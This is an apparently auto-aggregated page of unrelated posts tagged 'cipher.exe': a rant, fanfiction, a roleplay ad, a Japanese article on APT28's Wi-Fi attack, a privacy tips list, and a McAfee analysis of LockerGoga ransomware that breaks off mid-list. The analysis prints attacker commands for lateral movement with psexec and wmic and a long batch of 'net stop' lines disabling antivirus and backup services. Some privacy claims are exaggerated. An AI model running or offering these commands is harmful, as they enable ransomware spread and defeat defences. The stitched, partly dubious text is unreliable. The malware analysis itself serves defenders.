I really wish people would stop telling me to calm down when I am very calm discussing things. Just because I don’t respond the way you want does not mean I am not calm.

Do not tell me to chill out.

That’s when I’ll become not calm.

Likewise.

Don’t ask me a question if you’re going to kick off and not let me answer.

I’m sick to the back teeth of people invalidating my feelings just because theirs are sorely fucking hurt or telling me that I have no right to feel what I’m feeling.

Bill Cipher.EXE, BILL_Drowned, Lost Cipher, Glitchy Bill.

Sonic.EXE, BEN Drowned, Lost Silver, Glitchy Red… Gaming Creepypastas reference for you.

[I'M GONNA CRY I MISS ALL THOSE]-mod

Secure Your Data with Cipher on Windows 11

This article explains using the Cipher security tool to overwrite deleted data on Windows 11. The Cipher.exe command can encrypt and decrypt data on drives that use the NTFS file system. It can also be used to overwrite data that has been deleted so that it can’t be recovered or accessed. When you delete files or folders, the data isn’t initially removed from the hard disk. Instead, the space…

2024年11月25日 15時01分 向かいの建物にあるノートPCを遠隔から乗っ取るロシアのAPT28による「ニアレストネイバー攻撃」とは？ セキュリティ企業のVolexityが、ロシア軍に関連する脅威アクターグループ・APT28による「ニアレストネイバー攻撃」を検出したと報告しています。このニアレストネイバー攻撃は「最も近い隣人」という名の通り、標的企業の近くの建物にあるノートPCなどをリモートで乗っ取ってから、標的のWi-Fiネットワーク経由で不正アクセスを試みるというものでした。 The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access | Volexity https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/ Hackers breach US firm over Wi-Fi from Russia in 'Nearest Neighbor Attack' https://www.bleepingcomputer.com/news/security/hackers-breach-us-firm-over-wi-fi-from-russia-in-nearest-neighbor-attack/ APT28はロシア軍参謀本部情報総局(GRU)と関連するとみられる脅威アクターグループで、「Fancy Bear」「Strontium」「Pawn Storm」などのコードネームで呼ばれています。APT28はこれまで、世界アンチドーピング機関(WADA)や2016年アメリカ大統領選での民主党全国委員会などに対するハッキングに関与しているといわれています。 ロシア政府系ハッカー集団「ファンシーベア」が未発見のLinuxマルウェアツール「Drovorub」で国家安全保障を脅かしているとFBI・NSAが警告 - GIGAZINE Volexityによると、2022年2月にウクライナ関連の作業を行っていた「政府関連組織の顧客」のサイトでサーバー侵害を検出した時に、APT28による攻撃が検出されたとのこと。 Volexityが「GruesomeLarch」というコードネームで追跡していた脅威アクターらは、まず被害者の公開サービスを狙ったパスワードスプレー攻撃で、標的となる企業のWi-Fiネットワークへの認証情報を入手しました。しかし、多要素認証保護によってパブリックネットワーク上での資格情報の使用は阻止されました。企業のWi-Fiネットワーク経由での接続自体に多要素認証は必要ありませんでしたが、標的となった企業から何千kmも離れた海外から接続しているという状況が問題となります。 そこで、脅威アクターは標的の無線ネットワークの拠点となり得る近隣の建物内の組織を探し始めました。近隣の組織のネットワーク上で有線・無線の両方を備えたノートPCなどのデバイスがあれば、脅威アクターはワイヤレスアダプターを使って標的のWi-Fiネットワークに接続できるというわけです。 調査の結果、標的となった組織の会議室にある窓の近くにあるワイヤレスアクセスポイント3つに接続可能なデバイスが適切な範囲内にあることが判明。脅威アクターは複数の近隣組織を次々と侵害してWi-Fi接続をデイジーチェーン状につなぎ、最終的に標的組織にアクセスする手法を取りました。この手法により、攻撃者は物理的な近接性を必要とする攻撃の利点を得つつ、実際には遠隔地から安全に攻撃を実行することができました。 侵入後は、Cipher.exeを使用して痕跡を消去したり、VSSAdminを使ってActive Directoryデータベースを窃取したりするなど、「Living off the land」と呼ばれる手法を用いて、既存のWindowsツールを使って活動を行いました。 Volexityによると、使用されたツールやIPアドレスから攻撃者を特定できなかったため、脅威アクターが誰なのかを特定するのは当時困難だったとのこと。しかし、2024年3月にMicrosoftがAPT28についての調査レポートを公開し、この中で脅威アクターグループが用いた「GooseEgg」という攻撃ツールについての情報が明らかになりました。 GooseEggは、Windows印刷スプーラーの特権昇格の脆弱(ぜいじゃく)性であるCVE-2022-38028を悪用したものでした。そして、Microsoftが報告したファイル名やフォルダパス、batファイル内のコマンドがVolexityの観察したものと同一だったことから、Volexityは一連の攻撃はAPT28によるものだと結論付けています。 ニアレストネイバー攻撃は攻撃者が物理的に特定されたり拘束されたりするリスクを排除できる点が特徴で、物理的な近接性の利点を享受しながら、攻撃者は何千kmも離れた場所から安全に作戦を実行できます。Volexityは、熟練した脅威アクターがサイバー攻撃の目的を達成するためには徹底的な手段を取ると注意を促しています。 また、Wi-Fiネットワークがもたらす運用上のセキュリティリスクについて、より慎重に考える必要があると指摘しています。近年、インターネットサービスに対しては、多要素認証の導入やサービスの削減によって攻撃対象となる領域を狭めるような対策が進められてきました。しかし、Wi-Fiネットワークには同レベルの注意が払われていないことが多い、とVolexityは警告。企業のWi-Fiネットワークへのアクセスも、VPNなどの他のリモートアクセスサービスと同様の注意と配慮を持って扱う時期に来ているとしています。 この記事のタイトルとURLをコピーする

向かいの建物にあるノートPCを遠隔から乗っ取るロシアのAPT28による「ニアレストネイバー攻撃」とは？ - GIGAZINE

Internet security for those who really, really need it:

QUICK LIST:

Use 2FA and don’t sign into accounts on public OR SHARED computers.

Smart phones aren’t off ‘til the battery’s out.

Smart phones randomly record your voice.

Smart phones regularly record your location using GPS, cell towers, and wi-fi hotspots.

Websites and ad firms create profiles of your “digital fingerprint” from things as innocuous as the list of fonts installed on your computer.

Any device with a built-in webcam should have a webcam cover.

Never use biometrics -- that is fingerprint, voice, and facial recognition.

Faraday bags are not enough.

Sensitive activities should be done on public wifi with a device that does not use a SIM card and is never used for any other purpose in any other scenarios, including being powered on.

Non-sensitive activities should be done on private wired network or private wifi, with devices that never leave that environment.

cipher.exe

Dispose of any IoT devices you own. Unplug network printers when not in use. Do not print anything sensitive or incriminating on a color printer.

Passwords and 2FA: You should enable two-factor authentication (2FA) for every account that you possibly can. This requires an extra step behind a separate and ideally-protected device or account in order to log into any account. Do not use 2FA in a way that makes all 2FA fall apart from one single point of failure. ...Actually if anyone can figure out how to activate 2FA on Venmo, that'd be amazing. It doesn't seem to exist and that seems fully insane. Two big issues with choosing passwords:1. If your password is simple, it's easy. The most common passwords are things like "password," "aaaa," "1234," etc.2. If your password is used across multiple accounts, then compromising one compromises all of them. If you use a password manager, it can create very powerful passwords but also centralizes the passwords to one location that, if accessed, compromises literally every one of your accounts instantly. If you don't want to go the password manager route, think of a short phrase with punctuation and proper nouns in it that you can use for your passwords.

Webcam: On laptops and phones, get physical covers for your webcams, up to and including black tape; on desktops, make disconnecting the webcam as convenient as possible. (For example, I have a USB hub affixed to my monitor, which is what I plug my webcam into)

Biometrics and Device Locking: Do not give ANY biometric data to your devices. Ever. No fingerprint unlock. No facial ID. No Windows Hello. If you can make your unlock combination number longer, do it.

Signal Tracking: FARADAY BAGS DON'T WORK RELIABLY ANYMORE AGAINST CELL SIGNALS. If you've heard someone (such as myself mere days ago) recommend a Faraday bag, RFID bag, EMF bag, or some similar product designed to block radio signals for cell towers, bluetooth, and GPS, then please be advised that these used to work like 7-10 years ago but apparently do not work reliably to block cell signals anymore.

Some phones track you even when you've powered them off; and some phones record your voice (continuously or randomly), even when you power them off. As Edward Snowden once said: Your phone is not off until the battery is removed. And I don’t know of a single modern phone you can take the battery out of.

Remember: some phones track you, even when you power them off; and some phones record your voice (continuously or randomly), even when you power them off. As Edward Snowden once said: Your phone is not off until the battery is removed. And I don’t know of a single modern phone you can take the battery out of.

Account Tracking: If you're concerned about account tracking, then get more than one phone and more than one account. Split your time meaningfully between which phone you use. At worst, get a burner phone.

PC Thumbprint Tracking: Split your time on the internet between a public wi-fi device and a private network device. Counterintuitively, perform sensitive but unidentifiable activities on public wifi with a device you've designated for the purpose, and identifiable but mundane activities on private internet. The public device should be powered down (and wrapped in RFID bag if it's a phone) when you leave.

On public wifi devices, create unique accounts from the private network devices. Nary should these two things interface, no matter the distance. If you need to move files from one to another, an intermediate device such as a USB drive should be used.

Websites and apps can track you with cookies and IP addresses. But even beyond that, it can track you with installed fonts, installed mouse cursors, etc. Any basic computer settings your computer has, websites can track -- AND THEY DO.

Data Security: Deleting data off your computer does not actually erase that data. It simply marks the sectors that the data is written to as "marked for deletion," meaning other programs that need the space can freely overwrite those sectors. There is software that can un-delete files -- one of which back in the day was literally just called undelete.

If you need to make sure that data from a hard drive or solid state drive is erased to the point of unrecoverability, you have two options:

Full physical destruction -- but, I mean, you probably still wanna use that drive, right?

The cipher command.

Windows comes with a command called cipher, which writes 0's, then 1's, then random numbers, over every empty or marked-for-deletion sector of your drive. Simply type:

cipher /w:[Drive Letter]

For example, to use it on drive C:, you would type:

cipher /w:C

You can also encrypt your data using cipher, but I've never gone that far. To do so, you would type:

cipher /e [folder\subfolder] (this encrypts only the specified folder or subfolder)

cipher /e /s:[folder] (this encrypts the specified folder and all of its subfolders)

If you don't want to have any data at all left on the drive, you should format the drive, and then run cipher /w on it.

You don't want to use cipher on hard drives regularly, mind you; every time you do this, you cause millions of writes onto your drive, which lowers the lifespan of that drive.

Printers and Smart Devices: If you own anything that exists on the Internet of Things, destroy it. That's not hyperbole. If you have a smart device, do not in any way give it access your computer network; that includes smart TVs.

If you must have a network printer, whether you think it's a particularly "intelligent" printer or not, unplug it fully from the wall whenever it is not in use. Printers are one of the more common back-door points of entry, and they are pretty frequently running unsecured UNIX.

If you are printing sensitive documents, do not print them on a color printer, even if you’re printing in black-and-white. Color printers have identifying yellow dots that they print onto each document. This is how they got Reality Winner. If you think I’m joking, look it up.

... Anyway, don't ask me what brought all this on. Nothing in the news or anything, nope.

Guias IT-online: Encriptar/desencriptar pastas e ficheiros no Windows 10

Guias IT-online: Encriptar/desencriptar pastas e ficheiros no Windows 10

O Windows 10 disponibiliza nativamente, tal como em versões anteriores, o Encrypting File System (EFS). Este recurso de segurança permite a encriptação de pastas e ficheiros em unidades NTFS, protegendo-os desta forma contra acessos indesejados.

Quando uma pasta é encriptada com o EFS, esta deixa de estar acessível para outras contas de utilizador, quando acedida através da rede por outros…

View On WordPress

LOADING … NEW PLAYERS DETECTED. welcome BECK KYUNG, QUINCY CHOI & RHEE HANSEUL! we hope you enjoy your time with us. be ready to play in 24 HOURS, god knows what will happen if you aren’t. jeon jungkook, park jinyoung & jung jaehyun are now taken.

〘 JEON JUNGKOOK, CISMALE, HE/HIM 〙psst, have you heard about CIPHER.EXE? I heard BECKETT “BECK” KYUNG downloaded it. they’re just another CRIMINOLOGY student at the local uni, no one important… though I have heard that they can be terribly IMPETUOUS, but the fact that they’re PASSIONATE supposedly makes up for it. rumor has it the TWENTY ONE year old has a really bad fear of FAILURE + SPIDERS, which sounds really intense. wonder if it had anything to do with growing up in BOSTON, MASSACHUSETTS? they’re certainly intriguing, but it’s annoying how much they play ROCK + ROLL by EDEN. whenever I see them, I’m reminded of SOUND OF SHARP SKATES ON THIN ICE, RUNNING UNTIL YOU’RE DIZZY, SKINNED KNEES, SINGING ALONG LOUDLY TO THE RADIO LATE AT NIGHT. hopefully they don’t get too entangled in this whole CIPHER.EXE game, don’t want them to end up like the rest of the players… 〘 REYNA, EST, SHE/HER 〙

〘 PARK JINYOUNG, CISMALE, HE/HIM 〙 psst, have you heard about CIPHER.EXE? I heard QUINCY CHOI downloaded it. they’re just another NEUROSCIENCE student at the local uni, no one important… though I have heard that they can be terribly PRETENTIOUS + IDEALISTIC, but the fact that they’re RESOURCEFUL supposedly makes up for it. rumor has it the TWENTY year old has a really bad fear of TIGHT SPACES + DROWNING which sounds really intense. wonder if it had anything to do with growing up in NEW YORK CITY, NEW YORK? they’re certainly intriguing, but it’s annoying how much they play HOLD ON by FLOR. whenever I see them, I’m reminded of MESSY HANDWRITING, BURNING YOUR TONGUE ON COFFEE, AN UNWAVERING GAZE, CURSING UNDER BREATH. hopefully they don’t get too entangled in this whole CIPHER.EXE game, don’t want them to end up like the rest of the players… 〘 REYNA, EST, SHE/HER 〙

〘 JUNG JAEHYUN, CISMALE, HE/HIM 〙 psst, have you heard about CIPHER.EXE? I heard RHEE HANSEUL downloaded it. they’re just another FILM STUDIES student at the local uni, no one important… though I have heard that they can be terribly BLUNT, but the fact that they’re CHARISMATIC supposedly makes up for it. rumor has it the TWENTY TWO year old has a really bad fear of THE DARK, BEING BURIED ALIVE + BLOOD which sounds really intense. wonder if it had anything to do with growing up in SEOUL, SOUTH KOREA? they’re certainly intriguing, but it’s annoying how much they play COMFORTABLE by LAUV.  whenever I see them, I’m reminded of HUMMING IN AN EMPTY ROOM, SMILES FROM ACROSS THE ROOM, HOLDING HANDS TIGHT, LAUGHING UNTIL YOUR SIDES HURT. hopefully they don’t get too entangled in this whole CIPHER.EXE game, don’t want them to end up like the rest of the players… 〘 REYNA, EST, SHE/HER 〙

Tttsssss I...ah...hmmmm....Cipher.exe has stopped working.

This is too cute. Too precious. I die. Please have them carve the entirety of this into my headstone, if you’d be so kind.

Kiss prompt 48 for either Grillby/Shore or Gaster/Shore

(Also is it ok if I send another?)

(You can send as MANY as you like :D Also, just for you, you get BOTH) 

48: One person has to bend down in order to kiss their partner, who is standing on their tip-toes to reach their partner’s.

***

Monsters, far more than humans, come in a very wide variety of shapes and sizes. The smallest you’ve seen are no larger than the palm of your hand, while the largest ones easily reach the size of whales (though for the most part, those monsters stick to the ocean or mountains and aren’t nearly as common). 

You’re just lucky enough to have found yourself involved with two that range on the much taller than the average human spectrum. Grillby is admittedly more fluid in his height, given the ever changing nature of the flames on the top of his head. But at any given moment, he easily hits the mid range between six and six and a half feet tall.

Then there’s Gaster. Gaster, who ‘supposedly’ modeled after a typical human skeleton. There is nothing typical about that monster, from his bone structure to the fact that he stops just shy of seven feet tall when he actually stands up straight. 

As for you. Well. Tall isn’t exactly a word one would use to describe you. ‘Tiny’, ‘Squirt’, and ‘Beansprout’ are the more common words. Standing between the two monsters never fails to encourage snickers among your friends. You’re more than used to it at this point. Not to mention, there is something very satisfying about being able to be very snugly fit between them during movie time on the couch and other such activities. 

So it fills you with great delight on the very rare occasion that Gaster and Grillby find themselves too short to reach something. In this particular instance, it’s Grillby that you come upon; he’s frowning up at the very top of one of the shelves in the bar where the ‘good stuff’ lives. The item he’s after is a bottle that’s sat at the very top shelf for as long as you’ve been coming to the bar, like some silent watcher of the place.

“What happened to the stool in the kitchen?” he asks, flames twitching like the tail of a hyper cat. 

“Uh, Gaster might have broken it. Last week when he did the thing with the-”

“Toaster, yes I remember now.” Grillby sighs. “When I put it up there I didn’t think anyone was ever actually going to want it, let alone put in a pre-party request for it.” 

“I could climb the shelves?” you offer with a wide grin. 

“Absolutely not.” 

Ah, a shame but not surprising. You purse your lips. “Oh! Here, kneel down.” 

His brows raise with a dash of color. “That’s the opposite of what we’re trying to do here.” 

“Hush and just do it.” 

He snorts a soft puff of smoke but does as you ask, lowering down to his knees. Gleefully you move behind him and carefully swing your legs over his shoulders. “Think you handle lifting me up?” 

That gets a genuine laugh out of him. “I think I can manage.” Hands on your calves, he smoothly stands back up with no effort. To him and his mighty elemental strength, you probably weigh about as much as a loaf of bread to him.

You squeak at the sudden change in height, wrapping your arms around his neck. The floor is so far away! “Wow, you really can see everything up here,” you say breathlessly. 

“You okay?” 

“Yeah, just adjusting to the change in altitude. The air’s rather thin up here.” 

“Just grab the bottle, would you please?”    

You gently whack his head. “Gimme a minute, this is a new experience!” 

The soft tingle of the bell at the front of the empty bar signals Gaster’s return from his work at the university. He pauses just inside the door, a mighty grin creeping up his skull at the sight of you two. 

“Why Shore, it looks like those growth simulants I’ve slipped in your drinks are finally working,” he says lightly as he crosses over to you, casually tossing his bag down on an empty chair as he passes by it. 

“You jest but I wouldn’t put it past you.” Woah, this is weird. For the first time you’re actually looking down at the skeleton, rather than craning your neck up. It makes a delighted thrill run through your chest. “Good day at work?” 

He hums in affirmation, pressing a skeletal nuzzling kiss on Grillby’s cheek. “Hello dear.” 

“Hi,” Grillby murmurs sweetly.

You pout. “Hey, where’s mine?” 

Cheekily, Gaster sighs. “Well I can’t reach you up there, now can I?” 

“Oh put in a little effort!” You crook your finger at him. “C’mon, lets see some tippy toes from you for once.” 

Gaster’s brows raise. “May I borrow you?” he asks Grillby. 

Grillby shrugs under your legs. “Go wild. I’m already the stool for the day it seems.” 

Gaster places one long fingered hand on Grillby’s chest for balance and rises up on his tiptoes. Even so, you have to bend over a little to meet the gentle kiss he nuzzles on your cheek. Warmth blooms and tingles over the spot his kiss landed and you grin goofily at him as he lowers himself back down. 

“Satisfied?” he asks. 

“Very.” You put your hands on Grillby’s cheeks, gently turning his head up to you. “And one for my favorite stepstool.” You kiss his forehead, all hunched over to reach. But it’s worth it to see the pleased blue that swims through his flames. 

Gaster watches the two of you, eye lights soft. “So uh, what exactly prompted this whole thing? Curiosity?” 

“Hmm?” Oh yeah! “Bottle!” You reach out and grab it, holding it triumphantly in the air. 

Or at least that’s your plan. It’s heavy and thick with dust and it slips right between your fingers. Fortunately, Grillby reacts with his usual reflexes, releasing one leg to grab the bottle mid-air. You wobble just a little, clinging to his neck. 

All three of you release a breath. “Let’s get you down before anything breaks,” Grillby says rather calmly, despite the sputtering of his flames. 

“Yeah, good idea,” you agree. 

Encryption editor #редактор #шифровок #editor #encryption #editor #verschlüsselung #éditeur #cryptage #editor #cifrado #editor #crittografia 加密編輯器 #android #strore - https://play.google.com/store/apps/details?id=ru.cipedit #windows - http://www.familytree.ru/zip/cipher.exe #Ubuntu #Debian - http://www.familytree.ru/zip/cipher_4.0_all.deb #OpenSUSE #Mandriva #RedHat - http://www.familytree.ru/zip/cipher.tar.gz #familytree.ru

Client Pro Chapter 5

Client Pro Chapter 5

After copying EFS-encrypted files from Comp1 to Comp2, no one can open the files and access the data on Comp2. Which can you do to give users access to files on Comp2? (Select two. Each answer is a complete solution.)Use Cipher.exe to transfer the encryption certificates. Use USMT to transfer the encryption certificates.2. Consider the password policy settings shown in the exhibit. You just created a new…

View On WordPress

I am revamping some OC stuff.

I have retired my shadow company OCs for now, but they may come back at a much , much later date.

You can also expect 3 more cod Black Ops ocs so if that’s something that might interest you, then stay tuned!

Original Post from McAfee Author: Marc Rivero Lopez

Initial discovery

Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new features to the tried and true formula of encrypting victims’ files and asking for payment to decrypt them, has gained notoriety for the targets it has affected.

In this blog, we will look at the findings of the McAfee ATR team following analysis of several different samples. We will describe how this new ransomware works and detail how enterprises can protect themselves from this threat.

Technical analysis

LockerGoga is a ransomware that exhibits some interesting behaviors we want to highlight. Based on our research, and compared with other families, it has a few unique functions and capabilities that are rare compared to other ransomware families that have similar objectives and/or targeted sectors in their campaigns.

In order to uncover its capabilities, we analyzed all the samples we found, discovering similarities between them, as well as how the development lifecycle adds or modifies different features in the code to evolve the ransomware in a more professional tool used by the group behind it.

One of the main differences between LockerGoga and other ransomware families is the ability to spawn different processes in order to accelerate the file encryption in the system:

Like other types of malware, LockerGoga will use all the available CPU resources in the system, as we discovered on our machines:

Most of the LockerGoga samples work the same way but we observed how they added and removed certain types of functionality during their development lifecycle.

The ransomware needs be executed from a privileged account.

LockerGoga works in a master/slave configuration. The malware begins its infection on an endpoint by installing a copy of itself on the %TEMP% folder.

After being copied, it will start a new process with the -m parameter.

The master process runs with the -m parameter and is responsible for creating the list of files to encrypt and spawning the slaves.

The slave processes will be executed with a different set of parameters as shown below. Each slave process will encrypt only a small number of files, to avoid heuristic detections available in endpoint security products. The list of files to encrypt is taken from the master process via IPC, an interface used to share data between applications in Microsoft Windows. The communication is done through IPC using a mapped section named SM-.

Here is the IPC technique used by LockerGoga:

The master process (run as -m) creates a named section on the system for IPC.

The section is named “SM-tgytutrc”.

The master ransomware process posts the filepath of the file to be encrypted to the named section “SM-tgytutrc”.

This section is used by the slave processes to pick up the filepath and encrypt the target file.

Sandbox replication of master process screenshot below showing:

Creation of the named section.

Subsequent creation of slave processes to encrypt target files on the endpoint.

Sandbox replication of slave process (encryption process) below showing:

Obtaining access to the section created by the master process.

Reading and encryption of a target file found based on the filepath specified in the named section.

The ransomware creates multiple slave processes on the endpoint to encrypt files. Some analysts believe this is the case simply because it speeds up the encryption process, but we are not convinced as the same outcome can be achieved via a multi-threaded approach in the ransomware process instead of a multi-process approach.

Instead, we suspect this approach is adopted for the following reasons:

Footprint: If every encryption process encrypts only a small number of files on the endpoint and terminates, then the overall footprint of the attack on the system decreases since it may be difficult to co-relate multiple encryption processes to the same threat.

Sandbox Bypass: Some sandbox-based detection systems monitor the threshold of the number of files written on the system and may co-relate it to the file extensions being written to. E.g. If a process reads, say, 200 files on the sandbox but only creates files with one specific extension (typical of ransomware – Extn “.locked” in the case of LockerGoga) then this can be considered anomalous behavior. LockerGoga may be able to bypass such detection techniques.

File I/O based detection bypass: A multi-process-based approach makes sure that the amount of I/O (File/Disk I/O etc.) for each encryption process is within a certain limit, thus bypassing detection techniques that monitor exorbitant I/O based detection.

Reliability: Even if one encryption process is manually terminated by an end-user, as long as the master ransomware process is running the files will continue to be encrypted by new slave processes. If the ransomware process does not use the multi-process approach, then terminating the ransomware process stops the encryption on the endpoint.

Username Administrator:

Username Tinba:

The author implemented a logging function that can be enabled if you callout the sample in execution using the parameter “-l” to store all the results in a file called ‘log.txt’ in the root C drive:

During execution we enabled the log function and saw how the ransomware encrypts the system, causing high CPU usage and opening the ransom note during the process. This is the aspect in an infected system:

As we executed the sample with the log function, we could access this file to check the status of the encryption. Obviously, this most likely a debug function used by the developer.

In order to know how the ransomware works, and with the help of the log function enabled, we could establish the order of LockerGoga to encrypt the system:

Log file creation in the C: drive

Folder and file enumeration

File encryption & ransom note creation in the desktop folder.

One interesting thing to mention is that, before encrypting any file in the system, the malware will search for files in the trashcan folder as the first option. We are not certain why it takes this unusual step, though it could be because many people do not empty their recycle bins and the ransomware is looking to encrypt even those files that may no longer be required:

LockerGoga will start to enumerate all the folders and files in the system to start the encryption process. This enumeration is done in parallel, so we can expect the process wouldn’t take much time.

After the enumeration the ransomware will create the ransom note for the victim:

The ransom note was created in parallel with the encrypted files, and it is hardcoded inside the sample:

Like other ransomware families, LockerGoga will create the ransom note file to ask the user to pay to recover their encrypted files. We highly recommend not paying under any circumstance so as not to continue funding an underground business model. In case of a ransomware infection, please check https://www.nomoreransom.org

Below is an example of the ransom note content on an infected machine:

Greetings!

There was a significant flaw in the security system of your company.

You should be thankful that the flaw was exploited by serious people and not some rookies.

They would have damaged all of your data by mistake or for fun.

  Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.

Without our special decoder it is impossible to restore the data.

Attempts to restore your data with third party software as Photorec, RannohDecryptor etc.

will lead to irreversible destruction of your data.

  To confirm our honest intentions.

Send us 2-3 different random files and you will get them decrypted.

It can be from different computers on your network to be sure that our decoder decrypts everything.

Sample files we unlock for free (files should not be related to any kind of backups).

  We exclusively have decryption software for your situation

  DO NOT RESET OR SHUTDOWN – files may be damaged.

DO NOT RENAME the encrypted files.

DO NOT MOVE the encrypted files.

This may lead to the impossibility of recovery of the certain files.

  The payment has to be made in Bitcoins.

The final price depends on how fast you contact us.

As soon as we receive the payment you will get the decryption tool and

instructions on how to improve your systems security

  To get information on the price of the decoder contact us at:

In parallel of the ransom note creation, the files will start to be encrypted by LockerGoga with the .locked extension appended to all files. This extension has been broadly used by other ransomware families in the past:

LockerGoga has embedded in the code the file extensions that it will encrypt. Below is an example:

The sample has also configured some locations and files that will be skipped in the encryption process so as not to disrupt the Operating System from running.

All the files encrypted by this ransomware will have a specific FileMarker inside:

Note: The FileMarker identifies the ransomware family and the most likely version; in this case it is 1440.

During the investigation we identified the following versions:

1200

1510

1440

1320

Based on the binary compile time and the extracted versions, we observed that the actors were creating different versions of LockerGoga for different targets/campaigns.

After encrypting, LockerGoga executes ‘cipher.exe’ to remove the free space to prevent file recovery in the infected system. When files are deleted on a system, sometimes they are still available in the free space of a hard disk and can theoretically be recovered.

Samples digitally signed:

During our triage phase we found that some of the LockerGoga samples are digitally signed. We are observing from ATR that the latest ransomware pieces used a lower scale and more focused are released digitally signed:

MIKL LIMITED

ALISA LTD

KITTY’S LTD

Digitally signing the malware could help the attackers to bypass some of the security protections in the system.

As part of the infection process, LockerGoga will create a static mutex value in the system, always following the same format:

MX-[a-z]w+

Examples of mutex found:

MX-imtvknqq

MX-tgytutrc

MX-zzbdrimp

Interesting strings found

In our analysis we extracted more strings from the LockerGoga samples, with interesting references to:

LockerGoga

crypto-locker

goga

E:\crypto-locker\cryptopp\src\crc_simd.cpp

E:\crypto-locker\cryptopp\src\rijndael_simd.cpp

E:\crypto-locker\cryptopp\src\sha_simd.cpp

E:\crypto-locker\cryptopp\src\sse_simd.cpp

E:\goga\cryptopp\src\crc_simd.cpp

E:\goga\cryptopp\src\rijndael_simd.cpp

E:\goga\cryptopp\src\sha_simd.cpp

E:\goga\cryptopp\src\sse_simd.cpp

X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\crc_simd.cpp

X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\rijndael_simd.cpp

X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\sha_simd.cpp

X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\sse_simd.cpp

The malware developers usually forget to remove those strings in their samples and we can use them to identify new families or frameworks used in their development.

Spreading methods:

The malware is known to be spread in the local network through remote file copy. To do that, a set of .batch files are copied to the remote machines TEMP folder using simple copy:

copy xax.bat \123.123.123.123c$windowstemp

The malware will copy itself and the tool PSEXEC.EXE to the same location. Once all the files are copied, the malware will run the .BAT file using the following command:

start psexec.exe \123.123.123.123 -u domainuser -p “pass” -d -h -r mstdc -s accepteula -nobanner c:windowstempxax.bat

Each of these .BAT files contain lines to execute the malware on remote machines. They use the following command:

start wmic /node:”123.123.123.123″ /user:”domainuser” /password:”pass” process call create “cmd /c c:windowstempkill.bat”

The batch file above attempts to kill several AV products and disable security tools. At the end of the script, the malware copy on the remote machine is executed from

c:windowstemptaskhost.exe.

Due to the presence of these batch files and the fact that the malware binary makes no direct reference to them, we believe that the spreading mechanism is executed manually by an attacker or via an unknown binary. The path, username, and passwords are hardcoded in the scripts which indicate the attacker had previous knowledge of the environment.

The following is a list of all the processes and services disabled by the malware:

One batch file found in the infected systems where LockerGoga was executed will stop services and processes regarding critical services in the system and security software:

net stop BackupExecAgentAccelerator /y net stop McAfeeEngineService /y net stop BackupExecAgentBrowser /y net stop McAfeeFramework /y net stop BackupExecDeviceMediaService /y net stop McAfeeFrameworkMcAfeeFramework /y net stop BackupExecJobEngine /y net stop McTaskManager /y net stop BackupExecManagementService /y net stop mfemms /y net stop BackupExecRPCService /y net stop mfevtp /y net stop BackupExecVSSProvider /y net stop MMS /y net stop bedbg /y net stop mozyprobackup /y net stop DCAgent /y net stop MsDtsServer /y net stop EPSecurityService /y net stop MsDtsServer100 /y net stop EPUpdateService /y net stop MsDtsServer110 /y net stop EraserSvc11710 /y net stop MSExchangeES /y net stop EsgShKernel /y net stop MSExchangeIS /y net stop FA_Scheduler /y net stop MSExchangeMGMT /y net stop IISAdmin /y net stop MSExchangeMTA /y net stop IMAP4Svc /y net stop MSExchangeSA /y net stop macmnsvc /y net stop MSExchangeSRS /y net stop masvc /y net stop MSOLAP$SQL_2008 /y net stop MBAMService /y net stop MSOLAP$SYSTEM_BGC /y net stop MBEndpointAgent /y net stop MSOLAP$TPS /y net stop McShield /y net stop MSSQLFDLauncher$TPS /y net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPSAMA /y net stop MSSQL$BKUPEXEC /y net stop MSSQLSERVER /y net stop MSSQL$ECWDB2 /y net stop MSSQLServerADHelper100 /y net stop MSSQL$PRACTICEMGT /y net stop MSSQLServerOLAPService /y net stop MSSQL$PRACTTICEBGC /y net stop MySQL57 /y net stop MSSQL$PROFXENGAGEMENT /y net stop ntrtscan /y net stop MSSQL$SBSMONITORING /y net stop OracleClientCache80 /y net stop MSSQL$SHAREPOINT /y net stop PDVFSService /y net stop MSSQL$SQL_2008 /y net stop POP3Svc /y net stop MSSQL$SYSTEM_BGC /y net stop ReportServer /y net stop MSSQL$TPS /y net stop ReportServer$SQL_2008 /y net stop MSSQL$TPSAMA /y net stop ReportServer$SYSTEM_BGC /y net stop MSSQL$VEEAMSQL2008R2 /y net stop ReportServer$TPS /y net stop MSSQL$VEEAMSQL2012 /y net stop ReportServer$TPSAMA /y net stop MSSQLFDLauncher /y net stop RESvc /y net stop MSSQLFDLauncher$PROFXENGAGEMENT /y net stop sacsvr /y net stop MSSQLFDLauncher$SBSMONITORING /y net stop MSSQLFDLauncher$SHAREPOINT /y net stop SamSs /y net stop MSSQLFDLauncher$SQL_2008 /y net stop SAVAdminService /y net stop MSSQLFDLauncher$SYSTEM_BGC /y net stop SAVService /y net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPS /y net stop MSSQL$BKUPEXEC /y net stop MSSQLFDLauncher$TPSAMA /y net stop SDRSVC /y net stop SQLSafeOLRService /y net stop SepMasterService /y net stop SQLSERVERAGENT /y net stop ShMonitor /y net stop SQLTELEMETRY /y net stop Smcinst /y net stop SQLTELEMETRY$ECWDB2 /y net stop SmcService /y net stop SQLWriter /y net stop SMTPSvc /y net stop SstpSvc /y net stop SNAC /y net stop svcGenericHost /y net stop SntpService /y net stop swi_filter /y net stop sophossps /y net stop swi_service /y net stop SQLAgent$BKUPEXEC /y net stop swi_update_64 /y net stop SQLAgent$ECWDB2 /y net stop TmCCSF /y net stop SQLAgent$PRACTTICEBGC /y net stop tmlisten /y net stop SQLAgent$PRACTTICEMGT /y net stop TrueKey /y net stop SQLAgent$PROFXENGAGEMENT /y net stop TrueKeyScheduler /y net stop SQLAgent$SBSMONITORING /y net stop TrueKeyServiceHelper /y net stop SQLAgent$SHAREPOINT /y net stop SQLAgent$SQL_2008 /y net stop UI0Detect /y net stop SQLAgent$SYSTEM_BGC /y net stop 